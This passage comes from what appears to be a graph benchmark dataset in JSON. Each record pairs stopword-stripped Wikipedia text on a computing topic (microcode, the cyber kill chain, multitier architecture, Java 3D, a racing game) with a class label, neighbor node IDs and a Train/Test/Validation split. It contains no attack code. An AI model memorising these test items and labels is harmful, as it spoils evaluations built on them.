facilitated cpu design 1940s late 1970s large portion programming done assembly language higher-level instructions mean greater programmer productivity important advantage microcode relative ease powerful machine instructions defined ultimate extension directly executable high level language designs statement high-level language pl/i entirely directly executed microcode without compilation ibm future systems project data general fountainhead processor examples 1970s cpu speeds grew quickly memory speeds numerous techniques memory block transfer memory pre-fetch multi-level caches used alleviate high-level machine instructions made possible microcode helped fewer complex machine instructions require less memory bandwidth example operation character string done single machine instruction thus avoiding multiple instruction fetches architectures instruction sets implemented complex microprograms included ibm system/360 digital equipment corporation vax approach increasingly complex microcode-implemented instruction sets later called cisc alternate approach used many microprocessors use plas roms instead combinational logic mainly instruction decoding let simple state machine without much microcode sequencing mos technology 6502 example microprocessor using pla instruction decode sequencing pla visible photomicrographs chip operation seen transistor-level simulation microprogramming still used modern cpu designs cases microcode debugged simulation logic functions substituted control store logic functions often faster less expensive equivalent microprogram memory processor microprograms operate primitive totally different much hardware-oriented architecture assembly instructions visible normal programmers coordination hardware microcode implements programmer-visible architecture underlying hardware need fixed relationship visible architecture makes easier implement given instruction set architecture wide variety underlying hardware micro-architectures ibm system/360 32-bit architecture 16 general-purpose registers system/360 implementations actually use hardware implemented much simpler underlying microarchitecture example system/360 model 30 8-bit data paths arithmetic logic unit alu main memory implemented general-purpose registers special unit higher-speed core memory system/360 model 40 8-bit data paths alu 16-bit data paths main memory also implemented general-purpose registers special unit higher-speed core memory model 50 full 32-bit data paths implements general-purpose registers special unit higher-speed core memory model 65 model 195 larger data paths implement general-purpose registers faster transistor circuits way microprogramming enabled ibm design many system/360 models substantially different hardware spanning wide range cost performance making architecturally compatible dramatically reduces number unique system software programs must written model similar approach used digital equipment corporation dec vax family computers result different vax processors use different microarchitectures yet programmer-visible architecture change microprogramming also reduces cost field changes correct defects bugs processor bug often fixed replacing portion microprogram rather changes made hardware logic wiring 1947 design mit whirlwind introduced concept control store way simplify computer design move beyond ad hoc methods control store diode matrix two-dimensional lattice one dimension accepts control time pulses cpu internal clock connects control signals gates circuits pulse distributor takes pulses generated cpu clock breaks eight separate time pulses activates different row lattice row activated activates control signals connected described another way signals transmitted control store played much like player piano roll controlled sequence wide words constructed bits played sequentially control store however song short repeated continuously 1951 maurice wilkes enhanced concept adding conditional execution concept akin conditional computer software initial implementation consisted pair matrices first one generated signals manner whirlwind control store second matrix selected row signals microprogram instruction word speak invoke next cycle conditionals implemented providing way single line control store could choose alternatives second matrix made control signals conditional detected internal signal wilkes coined term microprogramming describe feature distinguish simple control store microinstruction microprogram provides bits control functional elements internally compose cpu advantage hard-wired cpu internal cpu control becomes specialized form computer program microcode thus transforms complex electronic design challenge control cpu less complex programming challenge take advantage cpu divided several parts may also memory address register memory data register used access main computer storage together elements form execution unit modern cpus several execution units even simple computers usually one unit read write memory another execute user code elements could often brought together single chip chip comes fixed width would form slice execution unit known bit slice chips amd am2900 family one best known examples bit slice elements parts execution units execution units interconnected bundle wires called bus programmers develop microprograms using basic software tools microassembler allows programmer define table bits symbolically close relationship underlying architecture microcode several properties make difficult generate using compiler simulator program intended execute bits way electronics allows much freedom debug microprogram microprogram finalized extensively tested sometimes used input computer program constructs logic produce data program similar used optimize programmable logic array even without fully optimal logic heuristically optimized logic vastly reduce number transistors number required rom control store reduces cost producing electricity consumed cpu microcode characterized horizontal vertical referring primarily whether microinstruction controls cpu elements little decoding horizontal microcode requires extensive decoding combinatorial logic vertical microcode consequently horizontal microinstruction wider contains bits occupies storage space vertical microinstruction horizontal microcode several discrete micro-operations combined single microinstruction simultaneous operation horizontal microcode typically contained fairly wide control store uncommon word 108 bits tick sequencer clock microcode word read decoded used control functional elements make cpu typical implementation horizontal microprogram word comprises fairly tightly defined groups bits example one simple arrangement might type micromachine implement jump instruction address following opcode microcode might require two clock ticks engineer designing would write microassembler source code looking something like tick common find portions cpu used remaining groups bits microinstruction no-ops careful design hardware microcode property exploited parallelise operations use different areas cpu example case alu required first tick could potentially used complete earlier arithmetic instruction vertical microcode microinstruction significantly encoded bit fields generally pass intermediate combinatory logic turn generates actual control sequencing signals internal cpu elements alu registers etc. contrast horizontal microcode bit fields either directly produce control sequencing signals minimally encoded consequently vertical microcode requires smaller instruction lengths less storage requires time decode resulting slower cpu clock vertical microcode assembly language simple conventional computer emulating complex computer processors dec alpha processors cmos microprocessors later ibm system/390 mainframes z/architecture mainframes palcode term used alpha processors millicode term used ibm mainframe microprocessors form machine code access special registers hardware resources available regular machine code used implement instructions functions page table walks alpha processors another form vertical microcode two fields field select selects part cpu controlled word control store field value actually controls part cpu type microcode designer explicitly chooses make slower cpu save money reducing unused bits control store however reduced complexity may increase cpu clock frequency lessens effect increased number cycles per instruction transistors became cheaper horizontal microcode came dominate design cpus using microcode vertical microcode used less often vertical horizontal microcode used horizontal microcode may referred nanocode picocode computers built using writable microcode design rather storing microcode rom hard-wired logic microcode stored ram called writable control store wcs computer sometimes called writable instruction set computer wisc many experimental prototype computers use writable control stores also commercial machines use writable microcode burroughs small systems early xerox workstations dec vax 8800 nautilus family symbolics l- g-machines number ibm system/360 system/370 implementations dec pdp-10 machines data general eclipse mv/8000 many machines offer user-programmable writable control stores option including hp 2100 dec pdp-11/60 varian data machines v-70 series minicomputers ibm system/370 includes facility called initial-microprogram load iml impl invoked console part power-on reset por another processor tightly coupled multiprocessor complex commercial machines example ibm 360/85 read-only storage writable control store microcode wcs offers several advantages including ease patching microprogram certain hardware generations faster access roms provide user-programmable wcs allows user optimize machine specific purposes starting pentium pro 1995 several x86 cpus writable intel microcode example allowed bugs intel core 2 intel xeon microcodes fixed patching microprograms rather requiring entire chips replaced second prominent example set microcode patches intel offered processor architectures 10 years age bid counter security vulnerabilities discovered designs spectre meltdown went public start 2018 microcode update installed linux freebsd microsoft windows motherboard bios design trend toward heavily microcoded processors complex instructions began early 1960s continued roughly mid-1980s point risc design philosophy started becoming prominent cpu uses microcode generally takes several clock cycles execute single instruction one clock cycle step microprogram instruction cisc processors include instructions take long time execute variations interfere interrupt latency far important modern systems pipelining designing new processor hardwired control risc following advantages microcoded cisc counterpoints well many risc vliw processors designed execute every instruction long cache single cycle similar way cpus microcode execute one microinstruction per cycle vliw processors instructions behave similarly wide horizontal microcode although typically without fine-grained control hardware provided microcode risc instructions sometimes similar narrow vertical microcode microcoding popular application-specific processors network processors microcontrollers digital signal processors channel controllers disk controllers network interface controllers graphics processing units hardware modern cisc implementations x86 family decode instructions dynamically buffered micro-operations μops instruction encoding similar risc traditional microcode hardwired instruction decode unit directly emits μops common x86 instructions falls back traditional microcode rom complex rarely used instructions example x86 might look μops microcode handle complex multistep operations loop string instructions floating point unit transcendental functions unusual values denormal numbers special purpose instructions cpuid",
    "neighbors": [
      4098,
      9739,
      4112,
      2066,
      7699,
      5655,
      10779,
      10781,
      5154,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      1606,
      3142,
      10316,
      2638,
      6742,
      7263,
      1122,
      7269,
      3175,
      8301,
      8815,
      7281,
      9330,
      630,
      8822,
      6268,
      3197,
      4742,
      7305,
      7313,
      8851,
      2201,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      11447,
      8890,
      7867,
      2237,
      4286,
      2241,
      2243,
      1735,
      9932,
      5329,
      10966,
      9432,
      217,
      731,
      5853,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      2808,
      249,
      3323,
      8700,
      7421,
      2303,
      1798,
      1801,
      6924,
      10508,
      6926,
      6415,
      1298,
      11539,
      7445,
      3350,
      3352,
      8474,
      10013,
      2339,
      6950,
      5415,
      7462,
      814,
      3886,
      11059,
      309,
      8501,
      8502,
      9525,
      10040,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      6477,
      7505,
      9044,
      3413,
      11604,
      344,
      863,
      1376,
      8543,
      869,
      8037,
      10603,
      4465,
      6515,
      10612,
      1399,
      3960,
      7033,
      1402,
      10104,
      5503,
      9599,
      3457,
      3459,
      4998,
      398,
      3470,
      5518,
      8590,
      5523,
      406,
      407,
      409,
      5529,
      1952,
      8609,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      8633,
      9657,
      1469,
      4030,
      6596,
      453,
      1990,
      3014,
      8143,
      10703,
      466,
      2514,
      473,
      1499,
      477,
      989,
      1501,
      1502,
      7134,
      5090,
      995,
      2533,
      7653,
      1000,
      1515,
      9707,
      10734,
      6639,
      9714,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7174,
    "label": 4,
    "text": "Kill_chain:kill chain term kill chain originally used military concept related structure attack consisting target identification force dispatch target decision order attack target finally destruction target conversely idea breaking opponent kill chain method defense preemptive action recently lockheed martin adapted concept information security using method modeling intrusions computer network cyber kill chain model seen adoption information security community however acceptance universal critics pointing believe fundamental flaws model one military kill chain model f2t2ea includes following phases integrated end-to-end process described chain interruption stage interrupt entire process four fs military term used united states military especially world war ii designed easy remember four fs follows new american military contingency plan called kill chain reportedly first step new strategy use satellite imagery identify north korean launch sites nuclear facilities manufacturing capability destroy pre-emptively conflict seems imminent plan mentioned joint statement united states south korea computer scientists lockheed-martin corporation described new intrusion kill chain framework model defend computer networks 2011 wrote attacks may occur phases disrupted controls established phase since cyber kill chain™ adopted data security organizations define phases cyber-attacks cyber kill chain reveals phases cyber attack early reconnaissance goal data exfiltration kill chain also used management tool help continuously improve network defense according lockheed martin threats must progress several phases model including defensive courses action taken phases u.s. senate investigation 2013 target corporation data breach included analysis based lockheed-martin kill chain framework identified several stages controls prevent detect progression attack among critiques lockheed martin cyber kill chain model threat assessment prevention tool first phases happen outside defended network making difficult identify defend actions phases similarly methodology said reinforce traditional perimeter-based malware-prevention based defensive strategies others noted traditional cyber kill chain n't suitable model insider threat particularly troublesome given likelihood successful attacks breach internal network perimeter organizations need develop strategy dealing attackers inside firewall need think every attacker potential insider ” unified version kill chain developed overcome common critiques traditional cyber kill chain uniting extending lockheed martin ’ kill chain mitre ’ att ck framework unified kill chain ordered arrangement 18 unique attack phases may occur end-to-end cyber attacks covers activities occur outside within defended network unified kill chain improves scope limitations traditional kill chain time-agnostic nature tactics mitre ’ att ck unified model used analyze compare defend end-to-end cyber attacks advanced persistent threats apts",
    "neighbors": [
      4689,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7175,
    "label": 7,
    "text": "Multitier_architecture:multitier architecture software engineering multitier architecture often referred n -tier architecture multilayered architecture client–server architecture presentation application processing data management functions physically separated widespread use multitier architecture three-tier architecture n -tier application architecture provides model developers create flexible reusable applications segregating application tiers developers acquire option modifying adding specific layer instead reworking entire application three-tier architecture typically composed presentation tier domain logic tier data storage tier concepts layer tier often used interchangeably one fairly common point view indeed difference view holds layer logical structuring mechanism elements make software solution tier physical structuring mechanism system infrastructure example three-layer solution could easily deployed single tier personal workstation layers architectural pattern described various publications logical multilayered architecture information system object-oriented design following four common book domain driven design describes common uses four layers although primary focus domain layer application architecture explicit distinction business layer presentation layer i.e. presentation layer considered part business layer traditional client-server two-tier model implemented usual convention application layer service layer considered sublayer business layer typically encapsulating api definition surfacing supported business functionality application/business layers fact subdivided emphasize additional sublayers distinct responsibility example model–view–presenter pattern used presenter sublayer might used additional layer user interface layer business/application layer represented model sublayer also identify separate layer called business infrastructure layer bi located business layer infrastructure layer also sometimes called low-level business layer business services layer layer general used several application tiers e.g currencyconverter infrastructure layer partitioned different levels high-level low-level technical services developers often focus persistence data access capabilities infrastructure layer therefore talk persistence layer data access layer instead infrastructure layer technical services layer words kind technical services always explicitly thought part particular layer layer top another depends every layer exist without layers requires layers function another common view layers always strictly depend adjacent layer example relaxed layered system opposed strict layered system layer also depend layers three-tier architecture client-server software architecture pattern user interface presentation functional process logic business rules computer data storage data access developed maintained independent modules often separate platforms developed john j. donovan open environment corporation oec tools company founded cambridge massachusetts apart usual advantages modular software well-defined interfaces three-tier architecture intended allow three tiers upgraded replaced independently response changes requirements technology example change operating system presentation tier would affect user interface code typically user interface runs desktop pc workstation uses standard graphical user interface functional process logic may consist one separate modules running workstation application server rdbms database server mainframe contains computer data storage logic middle tier may multitiered case overall architecture called n -tier architecture web development field three-tier often used refer websites commonly electronic commerce websites built using three tiers data transfer tiers part architecture protocols involved may include one snmp corba java rmi .net remoting windows communication foundation sockets udp web services standard proprietary protocols often middleware used connect separate tiers separate tiers often necessarily run separate physical servers tier may run cluster end-to-end traceability data flows n -tier systems challenging task becomes important systems increase complexity application response measurement defines concepts apis measuring performance correlating transactions tiers generally term tiers used describe physical distribution components system separate servers computers networks processing nodes three-tier architecture three processing nodes term layers refers logical grouping components may may physically located one processing node",
    "neighbors": [
      1280,
      6403,
      1801,
      4233,
      4107,
      5257,
      5772,
      9225,
      1808,
      3733,
      3990,
      10518,
      2456,
      11413,
      7708,
      5537,
      2596,
      7461,
      8100,
      10020,
      5034,
      2603,
      10925,
      2222,
      7983,
      8751,
      3388,
      3133,
      7100,
      8640,
      333,
      11343,
      337,
      4817,
      2901,
      10581,
      2011,
      862,
      734,
      8928,
      225,
      4194,
      8929,
      5357,
      1142,
      6262
    ],
    "mask": "Test"
  },
  {
    "node_id": 7176,
    "label": 9,
    "text": "Java_3D:java 3d java 3d scene graph-based 3d application programming interface api java platform runs top either opengl direct3d version 1.6.0 runs top java opengl jogl since version 1.2 java 3d developed java community process java 3d scene graph directed acyclic graph dag compared solutions java 3d wrapper around graphics apis interface encapsulates graphics programming using true object-oriented approach scene constructed using scene graph representation objects shown scene graph structured tree containing several elements necessary display objects additionally java 3d offers extensive spatialized sound support java 3d documentation available download separately part java development kit jdk intel silicon graphics apple sun retained mode scene graph apis development 1996 since wanted make java version decided collaborate making project became java 3d development underway already 1997 public beta version released march 1998 first version released december 1998 mid-2003 summer 2004 development java 3d discontinued summer 2004 java 3d released community source project sun volunteers since continuing development january 29 2008 announced improvements java 3d would put hold produce 3d scene graph javafx javafx 3d support eventually released java 8 javafx 3d graphics functionality less come supersede java 3d since february 28 2008 entire java 3d source code released gpl version 2 license gpl linking exception since february 10 2012 java 3d uses jogl 2.0 hardware accelerated opengl rendering port initiated julien gouesse java 3d high-level api option render 3d java part due pause development 2003 2004 several competing java scene graph technologies emerged general purpose gaming visualization addition many c c++ scene graph apis offer java support jni lower level jogl jsr 231 opengl bindings java popular alternative scene graph apis java 3d lwjgl another binding",
    "neighbors": [
      4358,
      910,
      10526,
      5031,
      5677,
      7983,
      6074,
      10683,
      5567,
      9665,
      10051,
      6860,
      3920,
      4960,
      2658,
      3560,
      3561,
      3562,
      5612,
      5872,
      9078,
      3705,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 7177,
    "label": 9,
    "text": "XML_Object_Model:xml object model xom xml document object model processing xml java strives correctness simplicity",
    "neighbors": [
      5677,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 7178,
    "label": 7,
    "text": "Artmotion:artmotion artmotion ltd. swiss based data housing provider operates two data centers near swiss alps designed security-seeking businesses favored country political neutrality ironclad privacy laws artmotion founded 2000 mateo meier also current ceo company 2003 artmotion acquired cyberhost swiss cloud hosting services provider 2004 became ltd. company since 2011 swiss datacenter provider everyware ltd. holds 25 percent artmotion shares artmotion increased capital 2015 2013 prism leak several cloud computing companies faced criticism lack security especially based us artmotion among swiss-based cloud computing providers gained scandal mostly due country stringent data privacy laws customer base increased company revenue 45 percent month following scandal according ceo mateo meier except european countries like luxembourg switzerland personal privacy difficult service modern world switzerland member european union hence exempt pan-european agreements share data member states well united states",
    "neighbors": [
      6344
    ],
    "mask": "None"
  },
  {
    "node_id": 7179,
    "label": 8,
    "text": "XMLVend:xmlvend xmlvend south african developed open interface standard facilitates sale prepaid electricity credit electricity utilities clients application web services facilitate trade various types devices utility prepayment vending server standard already introduced used prepaid water",
    "neighbors": [
      10020,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 7180,
    "label": 1,
    "text": "Schema_matching:schema matching terms schema matching mapping often used interchangeably database process article differentiate two follows schema matching process identifying two objects semantically related scope article mapping refers transformations objects example two schemas db1.student name ssn level major marks db2.grad-student name id major grades possible matches would db1.student ≈ db2.grad-student db1.ssn db2.id etc possible transformations mappings would db1.marks db2.grades 100-90 90-80 b etc. automating two approaches one fundamental tasks data integration general possible determine fully automatically different correspondences two schemas — primarily differing often explicated documented semantics two schemas among others common challenges automating matching mapping previously classified especially relational db schemas – fairly comprehensive list heterogeneity limited relational model recognizing schematic vs semantic differences/heterogeneity heterogeneities exist schemas use different representations definitions represent information schema conflicts different expressions units precision result conflicting representations data data conflicts research schema matching seeks provide automated support process finding semantic matches two schemas process made harder due heterogeneities following levels discusses generic methodology task schema integration activities involved according authors one view integration approaches schema integration broadly classified ones exploit either schema information schema instance level information schema-level matchers consider schema information instance data available information includes usual properties schema elements name description data type relationship types part-of is-a etc constraints schema structure working element atomic elements like attributes objects structure level matching combinations elements appear together structure properties used identify matching elements two schemas language-based linguistic matchers use names text i.e. words sentences find semantically similar schema elements constraint based matchers exploit constraints often contained schemas constraints used define data types value ranges uniqueness optionality relationship types cardinalities etc constraints two input schemas matched determine similarity schema elements instance-level matchers use instance-level data gather important insight contents meaning schema elements typically used addition schema level matches order boost confidence match results information available schema level insufficient matchers level use linguistic constraint based characterization instances example using linguistic techniques might possible look dept deptname empname instances conclude deptname better match candidate dept empname constraints like zipcodes must 5 digits long format phone numbers may allow matching types instance data hybrid matchers directly combine several matching approaches determine match candidates based multiple criteria information sources techniques also employ additional information dictionaries thesauri user-provided match mismatch information reusing matching information another initiative re-use previous matching information auxiliary information future matching tasks motivation work structures substructures often repeat example schemas e-commerce domain reuse previous matches however needs careful choice possible reuse makes sense part new schema domains example salary income may considered identical payroll application tax reporting application several open ended challenges reuse deserves work sample prototypes typically implementation matching techniques classified either rule based learner based systems complementary nature different approaches instigated number applications using combination techniques depending nature domain application consideration relationship types objects identified end matching process typically set semantics overlap disjointness exclusion equivalence subsumption logical encodings relationships mean among others early attempt use description logics schema integration identifying relationships presented several state art matching tools today benchmarked ontology alignment evaluation initiative capable identifying many simple 1:1 1 n n:1 element level matches complex matches n:1 n element structure level matches objects quality schema matching commonly measure precision recall precision measures number correctly matched pairs pairs matched recall measures many actual pairs matched",
    "neighbors": [
      10795,
      3146,
      8979,
      2901
    ],
    "mask": "Train"
  },
  {
    "node_id": 7181,
    "label": 2,
    "text": "Apper:apper apper originally named kpackagekit free open source linux front-end application packagekit package management service kde apper also one main difference compared old kpackagekit apper list applications instead listing packages makes much user-friendly allows user search install applications without added complexity dealing packages dependencies besides installation new applications also allows easy removal updates compared ubuntu software center well appstream project apper adopted distributions fedora debian opensuse 12.1",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7947,
      2448,
      1813,
      6680,
      8476,
      5670,
      4775,
      6694,
      7847,
      6828,
      8621,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      10172,
      3649,
      10817,
      9671,
      5067,
      3407,
      6991,
      6227,
      4951,
      7384,
      2010,
      9564,
      7140,
      5096,
      9324,
      7920,
      6257,
      1138,
      1522,
      3828,
      6389,
      10096,
      6393
    ],
    "mask": "Test"
  },
  {
    "node_id": 7182,
    "label": 2,
    "text": "Transformers_G1:_Awakening:transformers g1 awakening transformers g1 awakening turn-based tactics mobile game transformers franchise developed published glu mobile originally released feature phones november 12 2008 ported ios 2010 game redrawn applestore due licence reasons transformers g1 awakening announced botcon 2008 worldwide release set fall year second transformers game glu mobile released platform game mobile phones based michael bay 2007 live-action transformers film next transformers film would released 2009 glu decided maximize licensing agreement producing game n't tied major release unlike film adaptations awakening planned turn-based tactics game role-playing elements story set early days 1980s animated series interview fan site tformers.com glu mobile emea studio head chris white awakening product manager martin edelman explained desire make game based admiration well marvel comics series compared game advance wars series explained differed units expendable cannon fodder instead unit unique character franchise individual strengths attributes based existing personas game developed glu uk office previously company macrospace previous experience turn-based tactics games developed ancient empires series like turn-based tactics games player controls units case cast 23 transformers characters across small-scale grid-based levels order encourage much transforming possible player given option turn robot vehicle form end turn vehicle mode transformers travel receive reduced damage attack robot mode gain ability attack transformers capture structures necessary produce energy like pylons energy sources provide energon acts currency game energon allows player upgrade repair units summon additional characters play main campaign players control heroic autobots battling megatron forces villainous decepticons starting game bumblebee ratchet additional characters added story progresses unique abilities characteristics autobot leader optimus prime gives moral boost friendly units adjacent spaces increases battle performance ratchet turns ambulance game medic survival key robots survival city-sized metroplex serves autobot mobile base used summon supporting characters like prowl ironhide sideswipe trypticon serves function decepticons boombox blaster able summon minicassettes eject rewind goes decepticon soundwave underlings frenzy rumble cartoon jetfire must converted decepticon transforming tyrannosaur grimlock crushes decepticons ease initial release non-smart mobile phones 2008 drew positive attention based concept alone commenting announcement september release date pocket gamer spanner spencer said glad hear game based original series live-action film latter described pile rust cleverly disguised cgi extravaganza kotaku luke plunkett impressed early trailer game hoping developers would realize value port nintendo ds later repeated sentiment announcing playable java-based demo saying game looked surprisingly fantastic reviewers actually able play game equally positive early hands-on preview pocket gamer keith andrew claimed never previously understood appeal transformers said game bursting fun though felt game objectives challenging may require several play-throughs master also felt controls simple enough newcomers would daunted commended glu mobile creating game caters fan base appeals wider audience later full review described gameplay resource management meets chess felt game made trial-and-error puzzle-like nature levels somehow enjoyable rather frustrating gave game score 8/10 awarded pocket gamer silver award 2008 mobile release awakening featured retrospective titled visual history optimus prime video games ign jack devries brian altano felt awakening addition pretty good strategy game first game perfect appearance optimus prime supplanted later felt cel-shaded graphics colorful flat textures made optimus pop screen like action figure 2010 ports smartphone operating systems met similar enthusiasm initial announcement kotaku mike fahey wrote eagerly awaited game featured g1 transformers michael bay-bots later full review kotaku luke plunkett called game surprisingly authentic regards animated series also felt game could stand well made turn-based strategy game said 3d rendered battle sequences looked glorious iphone felt downside simplistic graphics animation outside battle showed game roots mobile game concluded recommending game anyone either long-suffering fan animated transformers fan turn-based strategy games stating easily one best games genre available ios ign levi buchanan felt although lifelong affinity transformers inclined judge poorly made adaptations harshly awakening disappoint transformers fans lauded thoughtful merger advance wars -style gameplay classic transformers fiction stating game great story strength transformers expertly woven entire production felt mission goals completely inline advancing story nothing arbitrary also felt glu choice transformers characters excellent thought cel-shading dynamic camera battle sequences made robot models look terrific gave game score 8.5 10 concluded stating transformers g1 awakening quite simply best transformers game ever played",
    "neighbors": [
      1083,
      9732,
      2259
    ],
    "mask": "None"
  },
  {
    "node_id": 7183,
    "label": 2,
    "text": "Need_for_Speed:_Undercover:need speed undercover need speed undercover 2008 racing video game twelfth instalment need speed series developed ea black box published electronic arts released november 18 2008 playstation 2 playstation 3 xbox 360 wii microsoft windows playstation portable nintendo ds number mobile phone platforms edition game ios later released april 27 2009 game sees players conducting illegal street races within fictional tri-city area main mode story focused player operating undercover police officer investigate links criminal syndicate stolen cars street racers gameplay operates manner previous entries though included larger selection licensed real-world cars rpg-styled system game main mode upon release game received mixed reviews many criticised game difficulty setting repetitive elements editions receiving lower scores due severe issues undercover later succeeded 2009 2010 game players take part illegal street races focus different styles races utilizing variety licensed real-world cars available time game development release upgraded customized new parts contending involvement police efforts impede player racing events featured game include series standard circuit point-to-point checkpoint races alongside return police pursuit events featured wanted addition undercover includes new events outrun players must overtake rival stay ahead period time highway battle similar carbon duel event players attempt stay ahead rival highway battling local traffic winning instantly pull far ahead losing exact opposite game modes consisting career single event multiplayer playstation 2 wii editions also feature fourth mode challenge series operates similar function wanted carbon career mode players take role undercover police officer seeking break syndicate operating within underground street race world like wanted players achieve completing racing events pursuit events majority events mode include opportunity dominate completing faster specified time record domination undercover progress story involves completing events earn money also experience wheelman rep special performance bonus bonuses either improve player driving abilities cars provide bonuses player playthrough i.e increase race earnings earning enough experience levels player wheelman level unlocking larger performance bonus new cars upgrade parts well additional events including jobs special story-based missions player must complete specific task taking criminal car police pursuits mode function like previous editions though player wheelman level directly impacts aggressive police pursuit player higher level tactics vehicle types used pursuit players freely select event game map using hotkey move highlighted event completing current one able replay previous events reduced amount cash game features wide variety licensed real-world cars divided three tiers performance four classes exotic tuner muscle sport players begin career mode limited selection cars use purchase unlock level earn additional cars defeating criminals story cars upgrades customisation done visiting player safehouse rather separate stores fine-tuning car performance also conducted manner nintendo ds playstation 2 playstation portable wii editions game players also use police vehicles upon unlocking main mode cars receive cosmetic damage game except highway battles job events possible total car event latter per specific parameters assigned job player undertaking multiplayer mode varies across platforms game launched online multiplayer possible windows playstation 3 xbox 360 editions playstation 2 wii editions feature split-screen multiplayer mobile phone platforms include game mode online multiplayer events consist multiplayer versions sprint racing highway battle along team-based event entitled cops robbers two teams players compete score points across two rounds first round robbers collect flags deliver specified areas score points cops attempt arrest earn points whereupon second round teams switch roles team highest score winning match playstation 2 wii features cops robbers multiplayer mode albeit fewer players allowed also feature two exclusive events lap knockout players compete across circuit last player end lap knocked winner remaining player end timed circuit players compete across circuit predetermined length laps time player first place end winning event game story events take place fictional region tri-city bay name influenced real-life city tri-city oregon mainly daytime sunrise sunset region consists four borough palm harbor downtown city district port crescent industrial port also houses naval base gold coast mountains mountainous region observatories wind farms sunset hills suburban town rural farms borough linked series highways region design heavily influenced real-life city miami alongside locations visited development team across gulf coast california coast setting open world map consisting around road nintendo ds edition boroughs named metropolis north port crescent south port crescent riverton wii playstation 2 editions game setting takes place within carbon-copy two boroughs taken wanted setting player undercover police officer tri-city bay police department tcbpd called palm harbor police station superior lt. jack keller paul pape player informed current investigation region underground street racing world joined inspector chase linh maggie q federal agent fbi wants bring international criminal syndicate operating region involved smuggling stolen cars player instructed pose new street racer join major illegal street races along gaining infamy tcbpd order secure entry syndicate player achieves recruited gang works syndicate run hector maio kurt caceres brother zack joshua alba time befriend carmen mendenz christina milian member gang brothers quickly assign player steal cars racing activities upon completing jobs chase instructs player arrest gang including brothers hector gang action player sent sunset hills order get recruited crew operated gmac david rees snell former tcbpd police officer rose largo heather fox honor student turned crime brad nickel rogers lawrence b. adisa former boxer whilst conducting races along jobs crew player instructed gmac steal car chau wu daniel d. lee leader syndicate player investigating player finds confronted chau offers overlook theft exchange player help recovering car lost needs back believing stolen gmac crew meeting carmen suggests theft likely committed someone else eventually player instructed arrest gmac crew though unable locate stolen car possession shortly arresting gmac crew carmen contacts players requests meeting upon reaching reveals zack hector unknowingly stole missing car chau asks get rid chau quickly contacts player moment take possession receive instructions deliver warehouse learning knows police officer kidnapped chase coerce compliance upon delivering car chase reveals corrupt federal agent working chau recover car possessed vital evidence activities sizeable quantity cash chau dispose player chase betrays murdering henchman framing player murder escaping money evidence player forced flee tcbpd upon wanted killings finds support keller instructions proceed take chase flee region way clear name successfully arresting chase keller commends player hard work recovering evidence managing forget undercover work informing carmen made plea bargain exchange testimony arrested crews time later player meets carmen give ride local university studying med student electronic arts ceo john riccitiello stated previous release series prostreet okay game ... good undercover would much better game stated undercover would considerably longer development cycle predecessors need speed development team split two teams would work two-year development cycle future titles alternating releases riccitiello stated torturing development team tight development cycle past change implemented mid-summer 2007 one team started working undercover giving 16.5 month development cycle team finished prostreet would start working next title riccitiello also stated undercover took inspiration action films transporter large embedded narrative frank gibeau president ea games label stated development due fact sales prostreet n't live ea hopes game need speed franchise would go back roots although undercover already developed prostreet john doyle developer ea black box said undercover would feature brand new game mechanic -ish sandbox style gameplay game also provided new damage system andy blackmore senior vehicle concept artist ea explained one porsche cars conceptualized game brought life game brief description approved porsche days undercover release ea revealed plot details video uploaded showed player evading capture tri-city police department tcpd reception undercover mixed complaints game easy difficulty repetitiveness poor texture maintenance ign review went far recommending game rivals rockstar games ea burnout paradise ign review critical ps3 version undercover giving 4/10 calling poor game ton problems practically redeeming qualities ign also commented reason open world environment lost player could start event map however xbox 360 pc versions received higher score contrast ps3 version ign review due fewer severe problems occurred 1up.com review called game fairly successful praised games selection cars tighter handling vehicles however leveling system unlocks cars upgrades criticized resembling grinding general sparse traffic wide-open roads poor ai led complaints extremely low difficulty however one reviewer commented may marketing ploy target wider audience reception live-action cutscenes almost universally negative many critics noting videos poorly acted lacked purpose compared cutscenes michael bay roland emmerich film lack connection crime fighting undercover cop story racing game play particularly criticized ign said ... run missions steal cars make 'special deliveries things like never actually see sequences show cops putting evidence together anything sort chase linh tell need get inside racing group order get dirt race 'll say 'we enough let move 're left asking help finally in-game frame rate received little praise gamespot particularly criticized ps3 version problem resulting lower score platform compared xbox 360 pc versions need speed undercover sold 1.4 million copies united states",
    "neighbors": [
      8937,
      10316,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 7184,
    "label": 9,
    "text": "TinyScheme:tinyscheme tinyscheme free software implementation scheme programming language lightweight scheme interpreter subset rrs standard meant used embedded scripting interpreter programs much functionality tinyscheme included conditionally allow developers balance features size/footprint tinyscheme used gnu image manipulation program gimp starting version 2.4 released 2007 gimp previously used siod tinyscheme used core direct revenue adware making world widely distributed scheme runtime",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      7128,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 7185,
    "label": 9,
